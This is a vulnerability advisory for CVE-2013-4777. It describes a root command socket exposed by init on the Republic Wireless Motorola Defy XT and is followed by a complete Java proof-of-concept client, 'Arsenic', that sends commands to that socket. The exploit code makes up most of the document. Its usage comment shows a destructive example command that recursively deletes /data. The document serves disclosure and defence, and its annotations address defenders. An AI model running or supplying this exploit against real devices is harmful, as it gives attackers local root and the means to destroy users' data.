Debug/test feature in init allows any user to execute shell commands as the root user on some Motorola and Sharp devices.

Let's see if we can bump my embarrassing presentation further down the page...

This vulnerability is being published now because the responsible parties have informed me that it will not be fixed, as no further updates are planned for the device. Very few devices are affected; the issue seems to be limited to one small carrier (Republic Wireless) in the US.

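At boot time, init creates a socket at /dev/socket/init_runit and accepts shell commands on it. When a command is sent, init executes it as the root user. Because any user can send commands to this socket, the result is a local privilege escalation to root.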

CVE: CVE-2013-4777

Affected Devices:
    Motorola Defy XT - Republic Wireless
    Probably others

The responsible parties for this have informed me that this issue will not be fixed due to the age of the affected device. Initial disclosure was July 9th 2013.



package com.cunninglogic.arsenic;

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

import android.net.LocalSocket;
import android.net.LocalSocketAddress;
import android.util.Log;

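/**
 * Proof-of-concept client for CVE-2013-4777: a debug/test socket named
 * {@code init_runit} that init exposes under /dev/socket on the affected devices.
 *
 * <p>What this class shows about the flaw: a command is written to the socket as a
 * two-byte length (low byte first) followed by the raw command bytes. No credential
 * or token is sent. The accompanying advisory states that init runs what it receives
 * as root.
 *
 * <p>For defenders: a device that has /dev/socket/init_runit is exposed. The advisory
 * states that no vendor fix is planned. A fix would need init to stop creating the
 * socket, or to restrict which processes may connect to it (the init side is not
 * visible in this file).
 *
 * <p>Not thread-safe: the connection state and {@link #buf} are static and are used
 * without synchronization.
 */
public class SocketComm {
    static String TAG = "Arsenic";
    // Shared scratch buffer; only the first two bytes (the length prefix) are used.
    static byte[] buf = new byte[0x400];
    // Not referenced anywhere in this class; kept in case other code in the package uses it.
    int buflen = 0;
    // Obtained on connect but never read here: any reply from init is ignored.
    static InputStream mIn;
    static OutputStream mOut;
    static LocalSocket mSocket;

    /* Arsenic for Motorola Defy XT (Republic Wireless) and others
     * By: jcase@cunninglogic.com
     * Usage:
     * SocketComm.execCommand("/system/bin/rm -r /data");
     *
     */

    /**
     * Sends one command string to the {@code init_runit} socket.
     *
     * @param command the command line to send; must encode to 1..1024 bytes
     * @return {@code true} if the length prefix and command bytes were written to the
     *         socket, {@code false} if the command was null or out of range, the
     *         connection failed, or the write failed. A {@code true} result only
     *         means the bytes were handed to the socket, because no reply is read.
     */
    public static boolean execCommand(String command) {
        if (command == null) {
            return false;
        }
        if (!connect()) {
            return false;
        }

        byte[] bytesCommand = command.getBytes();
        int length = bytesCommand.length;
        // Client-side limit from the original PoC. Whether init enforces the same
        // bound is not visible from this file.
        if (length < 1 || length > 1024) {
            return false;
        }

        // Two-byte length prefix, least significant byte first.
        buf[0] = (byte) (length & 255);
        buf[1] = (byte) (length >> 8 & 255);

        try {
            mOut.write(buf, 0, 2);
            mOut.write(bytesCommand, 0, length);
            // The original never set its result flag, so it returned false
            // even after a successful write.
            return true;
        } catch (IOException e) {
            Log.e(TAG, "command error");
            disconnect();
            return false;
        }
    }

    /**
     * Opens the connection to the {@code init_runit} socket if none is open yet.
     *
     * @return {@code true} if a connected socket and its streams are available
     */
    private static boolean connect() {
        if (mSocket != null) {
            return true;
        }

        LocalSocket socket = new LocalSocket();
        // Namespace.RESERVED resolves names under /dev/socket, i.e. /dev/socket/init_runit.
        LocalSocketAddress address =
                new LocalSocketAddress("init_runit", LocalSocketAddress.Namespace.RESERVED);
        try {
            socket.connect(address);
            mIn = socket.getInputStream();
            mOut = socket.getOutputStream();
            // Publish the socket only once it is usable. The original stored it before
            // connecting, so a failed attempt made later calls report "connected"
            // while mOut was still null.
            mSocket = socket;
            return true;
        } catch (IOException e) {
            Log.e(TAG, "connect error", e);
            try {
                socket.close();
            } catch (IOException ignored) {
                // Best-effort cleanup of a socket that never connected.
            }
            mIn = null;
            mOut = null;
            return false;
        }
    }

    /**
     * Closes the socket and its streams and clears the static connection state so
     * that the next {@link #connect()} starts from scratch.
     */
    private static void disconnect() {
        try {
            if (mSocket != null) {
                mSocket.close();
            }
            if (mIn != null) {
                mIn.close();
            }
            if (mOut != null) {
                mOut.close();
            }
        } catch (IOException e) {
            Log.e(TAG, "disconnect error", e);
        } finally {
            // The original called getInputStream()/getOutputStream() on a null
            // reference here, which threw NullPointerException out of the error path.
            mSocket = null;
            mIn = null;
            mOut = null;
        }
    }

}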